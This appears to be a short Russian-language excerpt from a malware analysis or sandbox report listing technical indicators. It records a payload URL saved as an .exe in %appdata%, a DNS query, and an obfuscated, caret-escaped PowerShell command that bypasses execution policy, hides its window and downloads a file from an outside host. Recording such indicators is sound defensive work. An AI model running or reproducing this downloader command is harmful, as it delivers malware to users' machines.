Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poweRsH^elL.exE -^EXecutIoNP^OlicY ^b^yPasS^ ^-N^O^P^Ro^FI^l^E^ -wInD^OW^s^TYLE HIddE^n (NeW-oBjECt s^y^S^Tem.NET^.WeBCL^IeNT).dO^W^NlO^aDfIle('http://newfoodas.top/read.php?f=...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /C "poweRsH^elL.exE -^EXecutIoNP^OlicY ^b^yPasS^ ^-N^O^P^Ro^FI^l^E^ -wInD^OW^s^TYLE HIddE^n (NeW-oBjECt s^y^S^Tem.NET^.WeBCL^IeNT).dO^W^NlO^aDfIle('http://newfoodas.top/read.php?f=...' (со скрытым окном)